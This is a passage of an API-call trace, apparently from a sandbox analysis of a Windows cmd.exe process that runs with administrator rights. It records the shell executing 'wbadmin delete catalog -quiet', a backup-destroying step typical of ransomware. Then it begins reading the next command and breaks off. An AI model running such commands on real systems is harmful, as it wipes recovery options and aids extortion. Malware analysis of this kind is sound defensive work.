returned 0x0 [0120.475] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0120.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e35a, cchWideChar=1 | out: lpWideCharStr="\nquiet\n") returned 1 [0120.475] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.475] GetFileType (hFile=0x120) returned 0x3 [0120.475] _get_osfhandle (_FileHandle=0) returned 0x120 [0120.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.475] _get_osfhandle (_FileHandle=1) returned 0x12c [0120.475] GetFileType (hFile=0x12c) returned 0x3 [0120.475] _get_osfhandle (_FileHandle=1) returned 0x12c [0120.476] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="wbadmin delete catalog -quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wbadmin delete catalog -quiet\n", lpUsedDefaultChar=0x0) returned 31 [0120.476] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x26f818, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f818*=0x1e, lpOverlapped=0x0) returned 1 [0120.476] GetProcessHeap () returned 0x460000 [0120.476] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4012) returned 0x47f630 [0120.476] GetProcessHeap () returned 0x460000 [0120.476] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47f630 | out: hHeap=0x460000) returned 1 [0120.476] GetProcessHeap () returned 0x460000 [0120.476] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0) returned 0x4797e0 [0120.476] GetProcessHeap () returned 0x460000 [0120.476] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x20) returned 0x474610 [0120.477] GetProcessHeap () returned 0x460000 [0120.477] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3e) returned 0x47aa40 [0120.477] GetConsoleOutputCP () returned 0x1b5 [0120.477] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0120.477] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0120.478] GetConsoleTitleW (in: lpConsoleTitle=0x26f7d0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0120.478] GetProcessHeap () returned 0x460000 [0120.478] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x218) returned 0x461ab0 [0120.478] GetProcessHeap () returned 0x460000 [0120.478] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4e) returned 0x479f20 [0120.478] GetProcessHeap () returned 0x460000 [0120.478] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x420) returned 0x47ba10 [0120.478] SetErrorMode (uMode=0x0) returned 0x1 [0120.478] SetErrorMode (uMode=0x1) returned 0x0 [0120.478] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47ba20, lpFilePart=0x26f060 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f060*="Desktop") returned 0x25 [0120.478] SetErrorMode (uMode=0x1) returned 0x1 [0120.478] GetProcessHeap () returned 0x460000 [0120.478] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x47ba10, Size=0x6c) returned 0x47ba10 [0120.478] GetProcessHeap () returned 0x460000 [0120.478] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x47ba10) returned 0x6c [0120.479] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0120.479] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.479] GetProcessHeap () returned 0x460000 [0120.479] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x128) returned 0x461cd0 [0120.479] GetProcessHeap () returned 0x460000 [0120.479] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x240) returned 0x479910 [0120.479] GetProcessHeap () returned 0x460000 [0120.479] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479910, Size=0x12a) returned 0x479910 [0120.479] GetProcessHeap () returned 0x460000 [0120.479] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479910) returned 0x12a [0120.479] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.479] GetProcessHeap () returned 0x460000 [0120.479] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe8) returned 0x475b70 [0120.479] GetProcessHeap () returned 0x460000 [0120.479] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x475b70, Size=0x7e) returned 0x475b70 [0120.479] GetProcessHeap () returned 0x460000 [0120.479] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475b70) returned 0x7e [0120.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.479] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0120.480] GetLastError () returned 0x2 [0120.480] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0120.480] GetLastError () returned 0x2 [0120.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x475c00 [0120.480] FindClose (in: hFindFile=0x475c00 | out: hFindFile=0x475c00) returned 1 [0120.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffffffffffff [0120.481] GetLastError () returned 0x2 [0120.481] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x475c00 [0120.481] FindClose (in: hFindFile=0x475c00 | out: hFindFile=0x475c00) returned 1 [0120.481] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0120.481] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0120.481] GetConsoleTitleW (in: lpConsoleTitle=0x26f320, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0120.481] GetProcessHeap () returned 0x460000 [0120.481] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x21c) returned 0x479a50 [0120.481] GetConsoleTitleW (in: lpConsoleTitle=0x479a60, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0120.481] GetProcessHeap () returned 0x460000 [0120.481] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x479a50, Size=0xb4) returned 0x479a50 [0120.481] GetProcessHeap () returned 0x460000 [0120.481] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x479a50) returned 0xb4 [0120.482] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - wbadmin delete catalog -quiet") returned 1 [0120.482] GetProcessHeap () returned 0x460000 [0120.482] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479a50 | out: hHeap=0x460000) returned 1 [0120.482] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f0d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f098 | out: lpAttributeList=0x26f0d8, lpSize=0x26f098) returned 1 [0120.482] UpdateProcThreadAttribute (in: lpAttributeList=0x26f0d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f088, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f0d8, lpPreviousValue=0x0) returned 1 [0120.482] GetStartupInfoW (in: lpStartupInfo=0x26f1f0 | out: lpStartupInfo=0x26f1f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x120, hStdOutput=0x12c, hStdError=0x12c)) [0120.482] GetProcessHeap () returned 0x460000 [0120.482] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x20) returned 0x474640 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.483] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0120.484] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0120.484] GetProcessHeap () returned 0x460000 [0120.484] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474640 | out: hHeap=0x460000) returned 1 [0120.484] GetProcessHeap () returned 0x460000 [0120.484] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x478900 [0120.484] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wbadmin.exe", lpCommandLine="wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f110*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wbadmin delete catalog -quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f0c0 | out: lpCommandLine="wbadmin delete catalog -quiet", lpProcessInformation=0x26f0c0*(hProcess=0x50, hThread=0x54, dwProcessId=0x694, dwThreadId=0x828)) returned 1 [0120.812] CloseHandle (hObject=0x54) returned 1 [0120.812] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0120.812] GetProcessHeap () returned 0x460000 [0120.812] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47eb10 | out: hHeap=0x460000) returned 1 [0120.812] GetEnvironmentStringsW () returned 0x478980* [0120.812] GetProcessHeap () returned 0x460000 [0120.812] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47eb10 [0120.812] FreeEnvironmentStringsW (penv=0x478980) returned 1 [0120.812] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x26e9c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x26e9c8, ReturnLength=0x0) returned 0x0 [0120.813] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffd3000, lpBuffer=0x26ea00, nSize=0x380, lpNumberOfBytesRead=0x26e9c0 | out: lpBuffer=0x26ea00*, lpNumberOfBytesRead=0x26e9c0*=0x380) returned 1 [0120.813] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0124.810] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f008 | out: lpExitCode=0x26f008*=0x0) returned 1 [0124.810] CloseHandle (hObject=0x50) returned 1 [0124.810] _vsnwprintf (in: _Buffer=0x26f278, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f018 | out: _Buffer="00000000") returned 8 [0124.811] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0124.811] GetProcessHeap () returned 0x460000 [0124.811] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47eb10 | out: hHeap=0x460000) returned 1 [0124.811] GetEnvironmentStringsW () returned 0x478980* [0124.811] GetProcessHeap () returned 0x460000 [0124.811] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47eb10 [0124.811] FreeEnvironmentStringsW (penv=0x478980) returned 1 [0124.811] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0124.811] GetProcessHeap () returned 0x460000 [0124.811] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47eb10 | out: hHeap=0x460000) returned 1 [0124.811] GetEnvironmentStringsW () returned 0x478980* [0124.811] GetProcessHeap () returned 0x460000 [0124.811] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47eb10 [0124.811] FreeEnvironmentStringsW (penv=0x478980) returned 1 [0124.811] GetProcessHeap () returned 0x460000 [0124.811] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x478900 | out: hHeap=0x460000) returned 1 [0124.811] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f0d8 | out: lpAttributeList=0x26f0d8) [0124.811] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0124.812] _get_osfhandle (_FileHandle=1) returned 0x12c [0124.812] SetConsoleMode (hConsoleHandle=0x12c, dwMode=0x0) returned 0 [0124.812] _get_osfhandle (_FileHandle=1) returned 0x12c [0124.812] GetConsoleMode (in: hConsoleHandle=0x12c, lpMode=0x4a92e194 | out: lpMode=0x4a92e194) returned 0 [0124.812] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.812] GetConsoleMode (in: hConsoleHandle=0x120, lpMode=0x4a92e198 | out: lpMode=0x4a92e198) returned 0 [0124.812] GetConsoleOutputCP () returned 0x1b5 [0124.812] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0124.812] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.812] GetProcessHeap () returned 0x460000 [0124.812] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475b70 | out: hHeap=0x460000) returned 1 [0124.812] GetProcessHeap () returned 0x460000 [0124.812] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479910 | out: hHeap=0x460000) returned 1 [0124.812] GetProcessHeap () returned 0x460000 [0124.813] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461cd0 | out: hHeap=0x460000) returned 1 [0124.813] GetProcessHeap () returned 0x460000 [0124.813] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47ba10 | out: hHeap=0x460000) returned 1 [0124.813] GetProcessHeap () returned 0x460000 [0124.813] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479f20 | out: hHeap=0x460000) returned 1 [0124.813] GetProcessHeap () returned 0x460000 [0124.813] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461ab0 | out: hHeap=0x460000) returned 1 [0124.813] GetProcessHeap () returned 0x460000 [0124.813] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47aa40 | out: hHeap=0x460000) returned 1 [0124.813] GetProcessHeap () returned 0x460000 [0124.813] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474610 | out: hHeap=0x460000) returned 1 [0124.813] GetProcessHeap () returned 0x460000 [0124.813] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4797e0 | out: hHeap=0x460000) returned 1 [0124.813] _vsnwprintf (in: _Buffer=0x4a946340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f538 | out: _Buffer="\r\n") returned 2 [0124.813] _get_osfhandle (_FileHandle=1) returned 0x12c [0124.813] GetFileType (hFile=0x12c) returned 0x3 [0124.813] _get_osfhandle (_FileHandle=1) returned 0x12c [0124.813] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0124.813] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f508, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f508*=0x2, lpOverlapped=0x0) returned 1 [0124.813] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0124.813] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a93c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0124.813] _vsnwprintf (in: _Buffer=0x4a92eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f548 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0124.813] _vsnwprintf (in: _Buffer=0x4a92ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f548 | out: _Buffer=">") returned 1 [0124.813] _get_osfhandle (_FileHandle=1) returned 0x12c [0124.813] GetFileType (hFile=0x12c) returned 0x3 [0124.814] _get_osfhandle (_FileHandle=1) returned 0x12c [0124.814] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0124.814] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x26f538, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f538*=0x26, lpOverlapped=0x0) returned 1 [0124.814] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.814] GetFileType (hFile=0x120) returned 0x3 [0124.814] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.814] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e320, cchWideChar=1 | out: lpWideCharStr="wbadmin delete catalog -quiet\nquiet\n") returned 1 [0124.814] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.814] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e322, cchWideChar=1 | out: lpWideCharStr="madmin delete catalog -quiet\nquiet\n") returned 1 [0124.814] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.814] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e324, cchWideChar=1 | out: lpWideCharStr="idmin delete catalog -quiet\nquiet\n") returned 1 [0124.814] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.814] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e326, cchWideChar=1 | out: lpWideCharStr="cmin delete catalog -quiet\nquiet\n") returned 1 [0124.814] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.814] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e328, cchWideChar=1 | out: lpWideCharStr=" in delete catalog -quiet\nquiet\n") returned 1 [0124.815] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.815] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.815] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32a, cchWideChar=1 | out: lpWideCharStr="sn delete catalog -quiet\nquiet\n") returned 1 [0124.815] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.815] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.815] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0124.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32c, cchWideChar=1 | out: lpWideCharStr="h delete catalog -quiet\nquiet\n") returned 1 [0124.815] _get_osfhandle (_FileHandle=0) returned 0x120 [0124.815] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.815] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, 